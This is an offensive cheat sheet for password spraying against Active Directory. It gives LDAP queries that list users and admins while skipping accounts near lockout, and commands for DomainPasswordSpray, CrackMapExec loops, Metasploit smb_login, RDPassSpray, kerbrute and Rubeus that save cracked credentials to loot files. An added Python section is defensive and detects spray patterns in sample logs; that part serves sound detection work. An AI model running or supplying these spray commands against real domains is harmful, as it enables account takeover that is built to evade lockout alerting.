Password Spray

Password spray

List targets

Users list (the second query also excludes disabled accounts, UAC bit 0x2, and accounts whose badPwdCount is already close to the lockout threshold)

([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties.samaccountname
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(badpwdcount<=<max_lockout_attempt - 2>))").FindAll().Properties.samaccountname
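The badpwdcount filter above is the spray's defining trait: each account receives only one or two failures, so lockout alerting never fires. A defender's detection therefore keys on many distinct accounts failing from one source inside a short window. The following is an added example, not part of the original page or of any tool it lists; the CSV log format and the sample lines are constructed, and the window, min_users and max_per_user thresholds are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a simplified "timestamp,event_id,user,source" CSV form (not a real
# Windows export): 4625 = failed logon, 4771 = Kerberos pre-auth failure, 4776 = NTLM failure.
SAMPLE_LOG = """\
2024-05-01T09:00:01,4625,alice,10.0.0.50
2024-05-01T09:00:02,4625,bob,10.0.0.50
2024-05-01T09:00:03,4625,carol,10.0.0.50
2024-05-01T09:00:04,4771,dave,10.0.0.50
2024-05-01T09:00:05,4625,erin,10.0.0.50
2024-05-01T09:00:06,4625,frank,10.0.0.50
2024-05-01T09:05:00,4625,alice,10.0.0.77
2024-05-01T09:05:10,4625,alice,10.0.0.77
2024-05-01T09:05:20,4625,alice,10.0.0.77
"""
FAILURE_EVENTS = {"4625", "4771", "4776"}

def parse_events(text):
    """Parse CSV lines into dicts with time/user/source; skip malformed or non-failure lines."""
    events = []
    for line in text.splitlines():
        parts = line.strip().split(",")
        if len(parts) != 4 or parts[1] not in FAILURE_EVENTS:
            continue
        ts, _, user, source = parts
        events.append({"time": datetime.fromisoformat(ts), "user": user.lower(), "source": source})
    return events

def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Map source -> sorted users for any source that failed against >= min_users distinct
    accounts within a sliding window while never exceeding max_per_user failures per account.
    That low per-account count is the spray signature: it stays under the lockout threshold,
    so lockout-based alerting alone never fires (assumed thresholds, tune per environment)."""
    by_source = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_source[ev["source"]].append(ev)
    hits = {}
    for source, evs in by_source.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1  # slide the window forward
            per_user = defaultdict(int)
            for ev in evs[start:end + 1]:
                per_user[ev["user"]] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                hits[source] = sorted(per_user)
    return hits
```

In the sample, 10.0.0.50 is flagged (six accounts, one failure each) while 10.0.0.77, a single account failing three times, is not; the latter is what a lockout rule would catch instead.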

Administrators list

Default protected administrative groups in Active Directory:

  • Enterprise Admins
  • Schema Admins
  • Domain Admins
  • Administrators
  • Account Operators
  • Server Operators
  • Print Operators
  • Backup Operators
  • Cert Publishers
  • Domain Controllers
  • Read-Only Domain Controllers
  • Replicator

([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname

Accounts whose password never expires (UAC bit 0x10000 set) and which are not disabled (UAC bit 0x2 clear)

([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties | ForEach-Object { if (($_.useraccountcontrol[0] -band 0x00010000) -and -not ($_.useraccountcontrol[0] -band 0x00000002)) { Write-Host $_.cn } }

Clean list that excludes disabled accounts and accounts at risk of lockout (DomainPasswordSpray):
https://github.com/dafthack/DomainPasswordSpray
https://github.com/mdavis332/DomainPasswordSpray (fork that uses Kerberos authentication!)

Get-DomainUserList -RemoveDisabled -RemovePotentialLockouts

Attacks

PowerShell

Invoke-DomainPasswordSpray -Force [-UserList <users.txt>] -Domain <domain_name> [-PasswordList <passlist.txt> | -Password <password>] -OutFile <loot.txt>
Invoke-DomainPasswordSpray -Force -Domain <domain_name> -Password <password> -OutFile <loot.txt>
Invoke-DomainPasswordSpray -Force -UsernameAsPassword -OutFile <loot.txt>

.NET

https://github.com/ustayready/SharpHose - NOT TESTED

CME

while read user; do crackmapexec <range> -u "$user" -p <password> -d <domain>; done < <users.txt>
while read user; do crackmapexec <range> -u "$user" -p "$user" -d <domain>; done < <users.txt>

MSF

use auxiliary/scanner/smb/smb_login

RDPassSpray
https://github.com/xFreed0m/RDPassSpray

python3 RDPassSpray.py -U <users.txt> -p <password> -d <domain> -t <host>

Kerberos methods

python kerbrute.py -domain <domain> -users <users.txt> -passwords <dico.txt> -outputfile <out>

Rubeus.exe brute [/users:<users.txt>] /passwords:<dico.txt> [/domain:<domain>] /outfile:<out>
Rubeus.exe brute /password:<password> /noticket

Azure / O365 - NOT TESTED